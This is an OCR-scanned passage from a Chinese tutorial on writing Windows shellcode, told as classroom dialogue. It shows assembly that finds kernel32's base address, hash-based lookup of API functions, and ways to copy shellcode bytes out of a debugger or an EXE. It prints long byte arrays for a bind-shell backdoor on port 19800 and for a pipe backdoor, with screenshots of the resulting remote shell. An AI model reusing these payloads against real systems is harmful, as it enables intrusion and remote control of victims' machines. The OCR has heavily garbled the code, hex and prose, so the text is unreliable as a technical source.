界 开始 ， 在 Windows 下 ， 这 个 粒度 是 64KB。 所 以 我 们 搜索 时 ， 可 以 按照 64kb 递 减 往 低地 址 搜 
来 ， 当 到 了 MZ 和 PE 标志 时 ， 就 找到 了 Kernel32 的 基地 址 。 实 现代 码 如 下 :” 


FindMZ: 

and eax,0xffff0000 //64k 对 齐 特 征 加 快 查找 速度 

cmp word ptr [eax], 'ZM' // 根 据 PE 可 执行 文件 特征 查找 KERNEL32 .DLL 的 基 址 
jne MoveUp 

mov ecx, [eax+0x3c] 

add ecx,eax 

cmp word ptr [ecx], 'ЕР' // 根 据 PE 可 执 4 pd еа DLL 的 基 址 
je Found // 如 果 符 合 MZ 及 PE 头 部 特征 ， 则 认为 已 经 找到 ， 并 通过 Eax 返 回 给 调用 者 
MoveUp: 

dec eax // 准 备 指 向 下 一 个 界 起 始 地 址 

jmp FindMZ 

Found: 

nop 


“2 Ву, еахф #7 0пһапаіедЕхсеріопЕійегр 75 +, #171 Ez eros, 4521] 
FindKernelBySEH.cpp (6 & 915%) ， 运 行 测试 一 下 。 


“在 VC 中 用 asm 关键 字 藤 入 汇编 ， 按 F10 单 步调 试 ， 到 最 后 一 句 时 ， 结 有 果 如 图 6 一 10。 得 到 
Kernel32 的 基 址 为 0x77E40000， 和 前 面 得 到 的 值 是 一 样 的 。” 


to FindEermelHrsEH 一 icrosoft Visual CH [break] 一 [FindEernelBySEH срр] 





В File Edit Be Insert Project [ebur Iols DriverStudio Winde Нр | 可 | 其 | 
ð Gg ЈЕ |[2-c2-|am'w|w| 十 向 
jema 7-77 CR 下 |@ =! = Ф| 

BBN ELS o m án E a = = = 



















_ asm 


miu esi,rs:ü 
lodcd 

GetExeceptionFilter: 

стр [&axs],Ukrrrrrrrr 


je CGetedExeceptionF ilter Ei 8e 5 —- Ti 5s 
nov rax,[cax] РЕШЕ Ба h — Ë | E113 
jmp GetExeceptionfilter 
GetedExeceptionFilter: 
nou eax, |eax+n| 
FindHz: 
and гах, ВхЕЕҒҒОВОЙ ИРАК FEITEN EE еј E 
стр word ptr [еах], "2н" //TRJEPER|TRTT: rE 特 证 查 拷 TERERHEL32 .DLL 的 基 址 
jne Hauellp 
fece АШИ 
cmp word ptr [ecx],' EP" УБ] РЕП] ТГ [ЕТЕР Ў KERHEL32 .DLLÉ^] KE 
Je Found ZARRA ONA PE RRE UA TASTE] 3B Ea ОНЯ RS 
Hauellp = 





dec eax ЕНЕ F — T од 
jmp FindhMz 


nop 可 


Found : 






















=| EAX = 77EhUBBE ^ 
LUX = TT DI ане 
ECX = 77EhHUFB 
EDX - ümni3pnpsn 
EST = BiM?FFHRA w 


la 1% 


Address: 
aüm2FFEB FF FF FF FF 86 ВВ E? 77 18 5h E? 77 00 Bü ап ов  ....!B x. MEME 
BBJ2FFFB Bü HH Bü BB EB BB BO AA AH 10 AH HB GB EH DB BB  .......... illc 
8mp38808 Wi ба 74 78 20 BB во BB H1 DB BH воа WË 05 AA BB Rñrtx .......4... 
AMIAMA 7506 AA nh AA AA Bh AA AA 2A AA AA AA AA AA AA ññ |------. ......- 
EAN 72 Я DEP йа 1h Da OA AN bp пп пп Pi p Hik AN AN Th PEH AO MA h 






ЯШ 六 





"3x 7 73 AR RIS TS КАТЫ, BUS SH MERZA. 


чаре К, ВЕН 6 63А, READER. "Ја, 


“在 病毒 中 ， 还 有 种 方法 也 是 类 似 的 。 原 理 是 : 可 执行 程序 都 由 Kernel32.dll 中 的 
CreateProcess 娘 数 来 调用 ， 所 以 病毒 先 得 到 堆栈 中 保存 的 返回 地 址 ， 也 束 是 Kernel32.dll 地 址 
空间 的 一 个 地 址 ; 然后 再 使 用 刚才 的 方法 向 上 搜索 ， 找 到 kernel32 的 基 址 。 代 码 如 下 : ” 


Mov dword ptr eax, [esp+0x1C] // 保 存 的 返回 地 址 ， 在 kerne132 中 
FIndMZ : 

and eax, 9xffff0000 //64k 对 齐 特 征 加 快 查找 速度 

cmp word ptr [еах], 'ZM' // 根 据 PE 可 执行 文件 特征 查找 KERNEL32 .DLL 的 基 址 
jne MoveUp 

mov ecx, [eax+0x3c] 

add ecx, eax 

cmp word ptr [ecx], 'EP' // 根 据 PE 可 执行 文件 特征 查找 KERNEL32 .DLL 的 基 址 
je Found // 如 果 符 合 MZ 及 PE 头 部 特征 ， 则 认为 已 经 找到 ， 并 通过 Eax 返 回 给 调用 者 
MoveUp: 

dec eax // 准 各 指向 下 一 个 界 起 始 地 址 

]mp FindMZ 

Found: 

nop 


“ 哦 ， 涉 及 到 病毒 了 ， 越 来 越 有 意思 了 。” 
呵呵， 本 是 同根 生 嘛 ! ” 


“获得 kernel32 的 基 址 后 ， 我 们 再 用 引出 表 获 得 Get 的 地 址 ， 再 获得 其 他 范 数 的 地 址 ， 是 
8 ? "同学 们 问 道 。 


“对 【但 要 注意 的 是 ， 这 个 方法 是 通过 搜索 异常 链表 ， 然 后 对 齐 搜索 得 到 kerner32 的 基 址 。 如 
果 浴 出 利用 方式 是 通过 宪 盖 SEH， 然 后 CALL EBX 或 pop рор ret 来 改变 程序 流程 ， 那 么 SEH 链 
已 经 被 我 们 履 孟 ， 这 种 方法 就 会 出 错 。” 


“ 哦 | 那 怎 么 办 Pas 


“此 时 ， 就 只 能 用 PEB 来 获得 kerner32 的 基 址 了 。 "老狼 有 点 遗憾 的 说 。 “然后 再 获得 范 数 的 地 
HE, ” 


老 症 说道, “AT 23 ERGetProcAddressEq2%7#BiHl:, Mit ОеіРгосАаагеѕ5 žit; Hy #l (tb EX 
数 的 地 址 外 。 还 有 一 种 改进 的 查找 方法 ， 就 是 直接 通 过 引出 表 把 所 有 阔 数 的 地 址 都 找 出 来 。” 


6.1.6 HASH 法 查找 所 函数 地 址 


“刚才 我 们 用 了 多 种 方法 ， 都 是 先 找到 GetProcAddress 男 数 的 地 址 ， 然 后 通过 它 找 到 其 他 函数 
的 地 址 。” 


“但 大 家 想 过 没有 ， 既 然 我 们 可 以 获得 GetProcAddress 画 数 的 地 址 ， 那 当然 可 用 同样 的 方法 获 
得 所 有 函数 的 地 址 啊 1 ”老病 问 道 。 


“R 1 ЕЩ 1 GetProcAddress 从 Kernel32.dll 的 输出 表 中 搜索 ; HBsenddZ Ze E dE se ES 24 АА 
Ws2_32.dll 的 输出 表 中 搜索 束 OK 了 1 " 宇 强 说 道 。 


“ 哦 ， 是 啊 ， 这 样 也 挺 方便 的 ! "其 他 同学 也 说 。 
“ 虽 ， 而 且 我 们 可 以 在 比较 函数 时 再 加 入 HASH 的 思想 ， 缩 短 查找 的 代码 。” 
小 知识 : HASH 


直接 音译 为 " 哈 硕 ”， 也 叫做 " 散 列 "。 融 是 把 任意 长 度 的 输入 ， 通 过 散 列 算法 变换 成 固定 长 度 的 
输出 ， 该 输出 融 是 散 列 值 。 这 种 转换 是 一 种 压缩 映射 ， 散 列 值 的 空间 通 彰 远 小 于 输入 的 空 
间 ， 不 同 的 输入 可 能 会 散 列 成 相同 的 输出 ， 而 不 可 能 从 散 列 值 来 唯一 确定 输入 值 。 


其 数学 表述 为 : h = H(M) Ж#Н, 'H( ) 表 示 单 向 散 列 函数 ; 'M' 表 示 任 意 长 度 明 文 ; 7 
定 长 度 散 列 值 。'H()' 第 一 要 满足 单 向 性 ， 第 二 是 抗 冲 突 性 ， 第 三 是 映射 分 布 均匀 性 和 差分 分 布 
均匀 性 ， 而 MD5 和 SHA1 可 以 说 是 目前 应 用 最 广泛 的 Hash 算 法 。 


“我 们 在 查找 了 琅 数 名 时 ， 不 必用 真正 的 玉 数 名 来 比较 ， Кани 个 HASH， 只 要 保证 所 有 轿 
数 的 HASH 值 不 同 ， 那 么 我 们 束 可 用 HASH 值 来 代 茶 画 数 名 进行 查找 。 


“ 哦 ! 使 用 HASH 值 比 用 名 称 有 什么 好 你 呢 ? "PLMM 问 道 。 


“HASH 值 是 定 长 的 ， 我 们 可 把 HASH 值 放 在 一 个 如 EAX 寄 存 器 中 ， 直 接 进 行 比较 ， 不 用 考虑 枚 
数 名 称 的 长 度 不 同 了 。 


' 哦 ， 是 这 样 啊 1 


“好 ， 我 们 再 看 一 个 通过 HASH 法 查找 所 有 男 数 地 址 再 调用 的 例子 。 下 面 是 一 个 别人 设计 的 公 
T uy 


字符 [0] 循 环 右 移 13 位 十 字符 [1]) 循环 右 移 13 位 ..…....+ 最 后 一 个 字符 
“通过 这 个 HASH 公 式 ， 可 得 到 一 些 函 数 名 的 HASH 值 ， 如 下 : 
LoadLibraryA 的 HASH 值 是 ECOE4E8E 

CreateProcessA 的 HASH 值 是 16B3FE72 


WSAStartup 的 HASH 值 是 3BFCEDCB 


WSASocketA 的 HASH 值 是 ADF509D9 
bind 的 HASH 值 是 C7701AA4 

listen 的 HASH 值 是 E92EADA4 
accept 的 HASH 值 是 498649E5 
closesocket 的 HASH 值 是 79C679E7 


“根据 这 种 思路 ， 我 们 得 到 BinduseHASH.cpp (光盘 有 收录 ) 。” 


unsigned char jeno bindport19800 sc[] = 
"NXEBNX10NX5BNXABNX33NXC9NX66NXB9Nxd9NX01NX80NX34NXOBNX99NXE2NXFA" 
"NXEBNXOBNXE8NXEBNXFFNXFFNXFFNX18NX75NX19NX99NX99NX99NX12NX6DSNx 71" 
"NAXDBNX98NX99NX99NX10NXO9OFNX66NXAFNXFANX17NXD7NX97NX75NXTANXFFNX98" 
"NX99NX99NX10NXDFNX91NX66NXAFNXFA1NX34NX40NX9CNX57NX71NXCENX98NX99" 
"NX99NX10NXDFNX95NXFANXFBNXFBNX99NX99NXFANXAANXABNXB7NXFDNXFANXEE" 
"NXEANXABNXC6NXCDNX66NXCFNX91NX10NXDFNX9DNX66NXAFNXFANXEBNX67NX2A" 
"NX8FENX7ZANXABNX98NX99NX99NX10NXDFNX89NX66NXAFNXFANXE7NXAANX7BNXEA" 
"NXTANXBANX98NX99NX99NX10NXDFNX8DNX66NXEFNXO9DNXF1NX52NX74NX65NXA2" 
"NAX71NX8ANX98NX99NX99NX10NXDFNX81NX66NXEFNX9DNXFA1NX40NX90NX6CNXx34" 
"NAX/71NX9ANX98NX99NX99NX10NXDFNX85NX66NXEFNX9DNXFANX3DNX83NXE9NX5BE" 
"NXT1NX6ANX99NX99NX99NX10NXDFNXB9NX66NXEFNX9DNXFANXS3DNX34ANXB7NX70Q" 
"NXTANX7ANX99NX99NX99NX10NXDFNXBDNX66NXEFNX9DNXFA1NX7CNXDONXAFNXDOQ" 
"NXTANXA4ANX99NX99NX99NX10NXDFNXB1NX66NXEFNX9DNXFANX7ENXEONXBFENXEOQ" 
"NAX71NX5BANX99NX99NX99NX10NXDFNXBBNXAANX66NX18NX75NX909NX98NX99Nx99" 
"NAXCDNXF1NX98NX98NX99NX99NX66NXCFNX81NXCONXCONXCONXCONXDO9NXCONXD9" 
"NXC9NX66NXCFNX85NX12NXA1NXCENXCENXFANXO9BNX99NxdANXCAINX12NX55NXFS3" 
"NX8FNXC8NXCANX66NXCFNXB9NXCENXCANX66NXCFNXBDNXCENXC8NXCANXG66NXCF" 
"NXB1NX12NX49NXFANXFCNXETNXFCNX99NXFANXFANXFANXFDNXB7NX10NXFFNXA9" 
"NXTANX75NXCDNX14NXABNXBDNXAANXBO9NXAANXBONXT1ANX5B8NX8CNX32NX7BNx64" 
"NXBENXDDNXBDNX89NXDDNX67NXDDNXBDNXABNX67NXDDNXBDNXAANXA10NXCDNXBD" 
"NXD1NX10NXCDNXBDNXDBNX10NXCDNXBDNXCONX14NXDDNXBDNX89NXCDNXCO9NXC8" 
"NXC8NXC8NXD8NXC8NXDONXC8NXC8NX66NXEFNXA9NXC8NX66NXCFNX89NX12NX55" 
"AXF3NX66NX66NXA8NX66NXCFNX95NX12NXBANXCENX66NXCFNXBBNX66NXCFNX8D" 
"ANXCCNXCFNXFDNX38NXA9NX99NX99NX99NX1CNX59NXET1NX95NX12NXD9NX95Nx12" 
"NXE9NX85NX34NX12NXFA1NX91NX72NX90NX12NXD9NXADNX12NX31NX21NX99N x99" 
"NX99NX12NX5CNXC7NXCANXBBNX9DNX99NXCANXCCNXCFNXCENX12NXF5NXBDNX81" 
"NX12NXDCNXABNX12NXCDNX9CNXETNX9ANXACNX12NXD3NX81NX12NXC3NXB9NX9A" 
"NXAANXT7ANXABNXDONX12NXADNX12NX9ANX6CNXAANX66NX65NXAANXB9NX35NXAG" 
"NXBDNXEDNX9ENX58NX56NX94NX9ANX61NX72NX6BNXA2NXEBNXBDNX8DNXECSNXx78" 
"NX12NXC3NXBDNX9ANXAANXFFNX12NX95NXD2NX12NXC3NX85NXO9ANXAANXA12NX9D" 
"NX12NX9ANX5BCNX72NX9BNXAANX5BONX12NXACNXC6NXC7NXCANXC2NXBBNX9DNX99" ; 


运行， 测试 ， 还 是 成 功 ! 如 图 6 一 11。” 








= “F:\Study\ 课 堂 讲 义 \ 投 稿 Vbook\ 六 高 级 ShellCode 编 程 \ 相 关 \DebugxtestJeno exe" _ 


c* Telnet 121.0.0. 1 


Microsoft Windows AP [hk 4 PR .26BB1 
Kc》 版 板 了 所 有 1985-2001 Microsoft Corp. 


F:sStudys]E SP TH SKIES book A E 06 ће11Соде 844952 >а 





T] ZR E... 铃声 响 了 。 


“这 是 个 经 典 代 码 小 但 强大 。 思 路 和 前 面 没什么 两 样 ， 只 是 加 入 HASH 搜 索 的 思想 。” 老 
JRBG3Ó, “下 课 了 ， 大 家 利用 查看 ShellCode 功 能 的 两 种 方法 跟踪 进去 ， 体 会 一 下 吧 1" 





Ол x rh ЖЕН ДЕЕ 


6.1.6 HASH 法 查找 所 函数 地 址 300 


6.2 ShellCode 的 高 效 提取 技巧 


“刚才 那个 代码 你 想 清楚 了 吗 ? 聪明 才子 ! " 课 间 时 小 傅 问 衬 强 。 
“ 唉 ， 别 这 人 么 说 呆 ， 我 会 不 好 意思 的 上 | 
小 倩 : “RE~ 


“我 跟踪 了 一 下 ， 那 个 程序 的 确 融 是 按照 老病 讲 的 思路 ， 先 找 Kernel32.dll 的 基 址 ， 然 后 用 
HASH 值 ， 在 相关 dl 的 引出 表 中 找 每 个 函数 的 地 址 。” 


“R, К Б =й! 


“呵呵 ! 剩 下 的 就 没什么 了 ， 就 是 我 们 一 般 ShellCode 的 编写 方法 。 具 体 程序 可 以 看 看 我 整理 
出 来 的 BindByHASH.cpp。 理 解 时 束 像 老病 说 的 : 关键 理解 思路 |” 


“ 哦 ， 等 会 儿 我 看 看 。 
“上 课 了 1 " 老 评 在 台 上 说 道 ， 大 家 赶紧 坐 好 。 
“大 家 觉得 通用 ShellCode 怎 么 样 ?” 


“ПЕ | 


EAT. АЖАЛ [ан Аб ҤЧ, ix FREMST. " 玉 波 满意 的 说 。 
“呵呵 ， 对 大 家 有 帮助 瓯 好 。 BRE. 


TL 


“通用 方法 是 有 了 ， 但 是 老病 ， 还 有 更 累 人 的 事情 啊 ! 还 要 提取 ShellCode 呢 1” 玉 波 再 次 问 
E, “这 人 么 长 的 代码 ， 让 我 们 一 个 个 抄 ， 太 不 厚道 了 吧 ? ” 


KRRIT, жй, “好 好 好 .………. 我 们 看 看 如 何 简单 的 提取 ShellCode 吧 ! ” 


6.2.1 汇编 内 存 提 取 


“还 是 用 一 个 实际 例子 吧 1 ”老病 说 ，“ 我 们 把 刚才 那个 监听 后 门 的 通用 汇编 代码 提取 成 
ShellCode, " 


“好 吧 ! 如 果 那 个 程序 一 句 名 的 对 应 着 抄 下 来 会 死人 的 ， 好 多 啊 1" 
' 呵 呵 ， 今 天 我 们 用 个 简单 的 方法 吧 ! 在 内 存 里 直接 拷贝 1” 
m? 如何 直接 拷贝 ?， 


“我 们 用 VC 人 散 入 汇编 ， 然 后 按 F10 进 入 调试 状态 ， 这 几 步 大 家 都 轻 车 束 路 了 吧 ! 在 真正 单 步 进 
和 人 我们 人 散人 的 汇编 代码 时 ， 用 前 面 编 写 汇 编 代 码 时 教 过 的 方法 调 出 内 存 窗 口 ， 在 内 存 窗口 中 
输入 eip ， 内 存 窗口 融会 显示 从 eip 开 始 的 数据 。” 


“而 此 时 从 eip 开 始 的 数据 ， 就 是 我 们 想 要 的 ShellCode 代 码 ， 如 图 6 一 12。” 


‘t Pipežállřersionád iN Hicrosoft Vizual Ci [break] [Disasseably] 





&lrile Edit View Insert Project Tebuz Tools [riverztucio Yinlow Hely -lale 


ашый ье a a I| w 








[ валатазт ЕВ Bh aa BB BD ———— 





T: _  asn 

ЕЕ { 

9: push еһр; 
[=> HdhH] HL 55 push enp 

10: sub esp. 100: 

09901 030 83 EC 5 Sul esp ,6hh 

11: nau  e&ebp,esp, 

Чито HH EL mou ebp,esp 

12: 

13: müg езх, =: 030 РЕВ 

09:01 052 їн à1 20 BB ИЙ BB mou eax,Fs:[BHüdnpaH38] 

1%: mau рах, [eax + ёхӨс] ;Lür 

ПШ ИТЕЛЕ dH bB WE mau eax,dword ptr [еах+ асп] 

15: mou esi, [eax + xdc] ;Flink 

B3^480185B8 SH га 1C Ту ъл ufuuru ріг Геах+ їси] 

18: lods 

09901 ALE RD lods dword ptr [esi] 

47 mou edi, [сан + йнйй] ;cdigkfÉhernel22.d1107181L 

BanG GAF SH 7H H8 Tou edi,dword ptr [eax*8 T 
k: > 













- = TTEABROR - 

“| EBX = 7FFDFEBBB | " m - 

EC$ = 77E60591 | EC 64 A1 39 BO bo 88 40 BC 8B -A ^ 
Е nH a Ap - Х.п 

ке А E 8B 34 8B 83 F7 BB 47 65 J.E .35.5..38Ge 
EDI = BO12FFBD 6F 63 N1 39 86 Bh 75 E7 CtP9.uzEroch9F.u. " 
EIP = BDNB1083CU 4D 8D 5à 1с юй пг во as 525.36.008. Е. 
ede BH 68 61 72 79 41 68 4C 69 ..fSELj.haryfRnLi 
ЕВР = В@12ЕЕВ@ 54 57 FF 55 AC 89 h5 SD 68 ом пааты. ШЎР 
LFL = пиши? a | г с 50 69 68 h3 72 65 61 5н 57 pe..htePihCcreaTU 

I | BHAB1BBC FF 55 4C 39 45 BA 68 73 54 BB 00 68 GF 63 05 73 .ULIZ.hsh..hoces 

| 16 | * иг Fat uñ PS 43. DH |° AM IM AL LM FU AM RU JY AL &3 La K LE LL hi^ ШШ ire ЕТТТ д 


МЕЗЕ ——_—_ LAZEE 
“ 哦 ?ShellCode 开 始 时 是 55 83 EC 64， 内 存留 口 里 也 是 55 83 EC 64， 真 的 一 样 也 |” 


“ 那 当 然 ， 数 据 又 不 会 从 天 上 掉 下 来 ， 都 是 在 内 存 里 面 的 ，" 老 病 说 ,“ 接 下 来 ， 我 们 束 可 以 从 
内 存 窗 口 里 拷贝 、 粘 贴 。 稍 微 整理 一 下 ， 然 后 把 空格 茶 换 成 ， 融 轻松 得 到 ShellCode 了 ! 


unsigned char ShellCode[] = 
NXBB5NX83NXECNX64NX8BNXECNX64NXAd1NX30NXO0O0NXOONXOONX8BNXAO0NXOCNX8B 
NX/0NX1CNXADNX8BNX78NX08NX8BNXA7NX3CNX8BNX5bANXO7NX78NXOS3NXD7NX8B 
NXAANX18NX8BNX5ANX20NXO3NXDFNX4A9NX8BNX34NX8BNXOGNXF7NXB8NXA7NX65 
NX/74NXBONX39NX0O6NX75NXFANXB8NX72NXG6FNX63NXA1NX39NX46NXOANX75NXE7 
NX8BNX5BANX24NXOSNXDFNX66NX8BNXOCNXABNX8BNXBANX1CNXO3NXDFNX8BNX0A 
NX8BNXOS3NXC7NX89NX45NXA4CNX6ANXO0NX68NX61NX72NX79NX41NX68NX4CNX69 
NX62NX72NX68NXACNX6FNX61NX64NX5BANXB7NXFFNXBBNXACNX89NX45NX50NX68 
V/ONX65NXx00ONXOONXG68NX74NX65BNXBONX69NX68NXA3NX72NX65NX61NX5BANX5 7 
NXFFNXBBNXACNX89NX45NXO4ANX68NX73NXA1NX00NXO0OONX68NX6FNX63NX65NX73 
NX68NX74NX65NX50NX72NX68NXA43NX72NX65NX61NX5BANX5B7NXFFNXBBNXACNX89 
NX45NX08NX6ANX65NX68NX64NX5BONX69NX70NX68NXAENX61NX6DNX65NX68NX50 
NX65NX65NXG6BNX5BANXB7NXFFNXBBNXACNX89NX45NXOCNX6ANX65NX68NX65NX46 
NX69NX6CNX68NX57NX72NX69NX7ANXBANXB7NXFFNXBBNXACNX89NX45NX10NX6ANXNX 
NX00NX68NX46NX69NX6CNX65NX68NX52NX65NX61NX64NX5bA4ANX5B7NXFFNXBBNXACNXNX 
NX89NX45NX14NX68NX65NX73NX73NX00NX68NX5ONX72NX6FNX63NX68NX45NX78NXNX 
NX69NX74NX5BANXB7NXFFNXBBNXACNX89NX45NX18NX68NX33NX32NX90NX90NX68NXNX 
NXB7NXT73NX32NXBFNXBANXFFNXBBNXBONX8BNXF8NX68NX75NX70NXO0NXO0NX68NXNX 
NAXT/4ANX61NX72NX74NX68NXB7NXB3NXA1NXB3NX5BANX5B7NXFFNXBBNXACNX89NXA45NXNX 
NX1CNX68NX65NX74NX00NXO0NX68NX73NXG6FNX63NXG6BNX5BANXB7NXFFNXBBNXACNXNX 
NX89NX45NX20NX6ANX0OO0NX68NX62NX69NXG6ENX64NX5BANXB7NXFFNXBBNXACNX89NXNX 
VABNX24NX68NX65NXGENXOONXOO0NX68NX6CNX69NX73NX74ANXBANXB7NXFFNXBBNXNX 
NXACNX89NX45NX28NX68NX70NX7ANXO0NXO0OO0NX68NX61NX63NX63NX65NX5BANX5B 7NXNX 
NXFFNXBBNXACNX89NX45NX2CNX6ANXO0NX68NX73NX65NXGENX64NX5BANXB7NXFFNXNX 
NXBBNXACNX89NX45NX30NX6ANXO0NX68NX72NX65NX63NX76NX5ANXB7NXFFNXBBNXNX 
NXACNX89NX45NX34NXB8NX0OONXOONXOONXOONXC6NXABNX38NX09NXCG6NXABNX3CNXNX 
NX00NXC6NXA45NXA40NXOONXCOGNXABNXAANXOONXCGNXABNXA8NXO0NX81NXECNX90NXNX 
VO1NXx0ONXxOONXBANX68NX02NX902NXO0NXOONXFFNXBBNX1CNX6ANXO6NXG6ANXOTNXNX 
NX6ANXO0O2NXFFNX55NX20NX8BNXD8NX33NXFFNX57NX57NXB8NX02NXO0NXOS3NX3ENXNX 
NXBONX8BNXFANXGANX10NXB6NXB3NXFFNXBBNX24NXAYNXATNXB7NXB3NXFFNXBBNXNX 
NX28NX6ANX10NX8DNX3CNX24NXB7NXB6NXB3NXFFNXBBNX2CNX8BNXD8NX33NXFFNX 
NXA7TNXB7NX33NXFFNX57NX6ANXOCNX8BNXFANX5B7NX5B6NX8DNXA4BNX3CNX5BONX8DNXNX 
NXABNX38NX5BONXFFNXBBNXOANXB7NXB6NX8DNXABNXAANXBONX8DNXABNXAONXBONXNX 
NXFFNXBBNXOANX81NXECNX80NX90NXO90NXOO0NX8DNX3CNX24NX33NXCONX68NX80NXNX 
NX00NXO0OONXOOGNXBONXF3NXABNX8DNX3CNX24NXB8NXO0O1NX01NX00NX90NX89NX47NXNX 
V2CNX8BNX45NX40NX89NX47NX38NX8BNX4BNX3CNX89NXA7NX3CNX8BNX45NX3CNX 
NX89NXA7NXAONXB8NX63NX6DNX64NX90NX89NXA47NX64NX8DNX44NX24NXA44ANXBONXNX 
NXB7NXBANXBANXBANXAT1NXBANXA9NXB1NX5B1NX8DNXA7NX64NX5ONXBANXFFNXBBNXNX 
NX08NX81NXECNXOONXOANXOO0NXOONX8BNXFANX33NXCONX5B1NX5B1NX8DNX7DNX48NXNX 
NXB7NXB8NX0ONXOANXOONXOONXBONXBGNX8BNXABNX38NXBONXFFNXBBNXOCNX8BNX 
NX07NX85NXCONX74ANX19NX33NXCONX5B1NX57NXFFNX37NXB6NXFFNX75NX38NXFFNX 
NXBBNX1A4NX33NXCONXBANXFFNX37NXB6NXB3NXFFNXBBNXS3ONXEBNXCSNX33NXCONXNX 
NXBANXB8NXOONXOANXOONXOONXBONXBOGNXB3NXFFNXBBNX34NX89NXO7NX33NXCONX 
NXBANX5B7NXFFNX37NX56NXFFNX75NXAANXFFNXBBNX10NXEBNXAA 


“用 教 过 的 方法 测 斌 一下， 轻松 成 功 1 如 图 6 一 13。” 


EE FipežállYřerČode 一 Шісгоғоїї Visual C++ 一 [PipezAl11VerCude. cppi 





[EY zile Elit }їзш Insert Frajeet duild Tools JriverStud:o Window Help 


Vu Hd х aalan m m %| "| «md c 
[ [Glabals] ~ |1 All global member: = | Ф main "| Б ы 


=] zJ "* XD, XC XANAX OR XCO XS BAUR AES A RNE XIV BR XE T RED E? D" 

- "KA x BEP x BEP x 55 x 6R B2 Sx H2 x BB X BEEF ESXxX 55x TEX x60 x B6 x GR X HT = 
e w BP xEFFESx55*x28yxBBE*sxD3*x3SXxFFx5 "ABB EE" 
FN аса GE E A ас" 

DE 
和 
和 
™ TENET Ne A AECA РЕНЕА ПЕН АЛЕ 
"^ y D se DE BP ЛГА ЕДЕ Л АКЫРАН ТУТ И - 
"хр X BBXX AS X ABXAXBUNXE7NxX3ENXBBA x55" aW. at L 211. 83. 164. 120 
“AKED INT X RI X BESXOSVXSDNK6USX DOS RE 
"*AXx571x51Xx5 4X 51XXx 47x513x 433x513 x51 
"МНЕ ARED BIS Въ навчин ИЙ, x BBN CF D 
^*x57 xBBSXx BEP x Bi x BB V хаво x 56s MEB 
"XOT aan ЕХ ii Hanea TEB 


=lẸ| x! 


je E ВЕ D 











Microsoft Windows KP [PS28 БЕГ] 
С) RW F: PH B 1995-2881 Microsoft Corp. 


“hnnk™ gw B 
"МББ TAIA CIAA FANIA OSI B er heok* 
"x5 1VxBSx DE. x x xdi x5H0sx56x53' l cus 
БУА УРЕ ЗУБЕ РЕХТУ FF 
ЕЕ p 由 的 类 是 ЕНТ 
int main() JEA- FNES-B5DC 
{ HE PESE 


(dvoid (x)(»oid)) &Shell2ose) 0; | АНААН vt hellCodefi Ех 2 


return ü; 2884-11-18 


2084—1110 





} 004-11-15 93:51: 41.984 testdJeno -nch 
2MMHd-11-15  2d:2/ ТАБ testdjeno.plg 
2084—11 бий 5 5:13 1.475 TITO rnie STU dd : cpp 
4 | | 2904—11 1 Я иг; = 1 5L ij © аа кес ҺЇН Ми ағыу i yp 
— _ 1  — uha THE J.325 testlena.dsp 
O —=-======== Configuration: PipezAlLUei pr EN EET 3-509 Еіпакеупе1ВуРЕВ. dsp 
Hl inking.. /H/H4—11-15 "72 FindKerneLlHyFEB.ncb 


Pipe2AhllUerrode.exe 一 8 error(s). B warning(s 





Build / Debug | Find ir Files 1 4| | 


LIE: 


文 么 好 的 方法 都 不 早 说 


法 





Dd alai 11 1» 


2884—11-15 


| "同学 们 叫 了 起 来 。 


“呵呵 ! 我 是 为 了 大 家 好 ， 先 真正 了 解 系 统 流 程 后 
从 EXE 文 件 中 提取 ShellCode。” 


TÜ PD Бе Јао. ер 


ее Лепо. dsu 





“ЖТТ EA Bu PP B Е == uj ! 
， 和 再 用 提高 效率 的 方法 。 我 们 再 来 看 一 种 方 


6.2.2 可 执行 文件 提取 


“我 们 得 到 汇编 的 程序 并 测试 成 功 后 ， 惑 会 生成 EXE 可 执行 文件 。” 老 评说 道 , “如 果 是 调试 
版 ， 会 在 Debug 目 录 下 ; 如 果 是 发 表 版 ， 会 在 Release 目 录 下 。 如 图 6 一 14。” 





tq) SEO SEV KEO IAW #80 


Cia- p Per [jos хня | [ 国 - 


БЕДЕ (D) O F: Study EAE booki A mék hellCodeffgfg HAA Debug 








TH x T']FinaKernelBySEH. exe 
B С book ^  " D FindKernelBySEH. ilk 
" e 04-022 — ГЭ FindKernelBySEH. obj 
a 1.5 [^ FindKernelBySEH. pch 
= (Ë Ms03-032En£ (9 FindKernelBySEHM pdb — 
E (©) Ms03-043Message CPipe2AlVer sionhSH. ехе 
= C 不 用 的 草稿 F^ Pipe2AllVersionASM. ilk 
国 e mx [^ Pipe2AllVersionASM. obj 
E |) 二 Windows Fshellcodeffit o PipecAliVersi onASM. pch 
日 (©) ATShalcodeifaf? [^ Pipe2AllVersionASM. pdb 
3 C 相关 [*]testJeno. exe 
C HER ГЭ tastTeno. ilk 
& (Су Z telnet Al RS (O) testJeno. obj 
Cim + ЕН ГЭ testJeno. pch 
e 我 在 川 大 ГЭ testTeno. pdb 
& (C3 五 Shel1Code 变 形 大 法 WD ve60. i db 
= È 一 findows 下 堆栈 缓冲 区 省 “| ve60.pdb 
Су 4 
由 [C foxmail 相 应 抓 图 
由 О 整理 后 


“我 们 用 任意 一 款 16 进 制 编辑 器 打开 EXE 文 件 。 我 这 里 用 的 是 WinHex 〈 光 盘 有 收录 ) ， 大 
可 以 看 到 ，EXE 的 开始 是 4D 5A， 融 是 MZ 标 志 ; 在 C0 那 排 有 一 个 PE 标志 ， 如 图 6 一 15。” 


Q 有 版 缓冲 区 浴 出 教程 





F-la Edit Causar =k, ок фа ола Уз ам Тее = Spaciilizmt Dp in snr Fil« H aurugar Window Falp 








ГжыЫ&®& Ham mU AANA — = | ШЕШШ O 22 qd k AE e 
P pc2^llVersionABM. eve сараа Farci oai: ana | = 有 
КҮШ Я а books Eni НЕ Paipco2ALllWorgsionASB.czc [= [m] S: 
File size; __ 15268 04  Offsa- 4 5 6 7 B 393 А B CD E F 
155,748 bytes _ | 

| 00000000 03 00 JO 00 04 00 00 DO FF FF 00 00 
M 00000010 оо оо 20 00 40 DO оо оо оо 00 оо 00 
Sale- origina | Uuuuuuzu uu uu Ju UU UU uu uu uu uu UU UU UU 
СЕЕН ui 00000030 оп оо 30 оо оо оо оо пй 28 оо оо йй 
Dhia Peres ш 4 00000040 00 B4 19 CD 21 B8 01 4C 7D 71 54 68 | ..7.???L?Th..B. 

一 一 00000050 72 БЕ 57 72 61 BD 20 63 61 БЕ 6E ВЕ is program canno 
ктейтш Mee 00000060 20 72 75 BE 20 69 BE 20 44 ЗЕ 53 20 t be run in LOS 
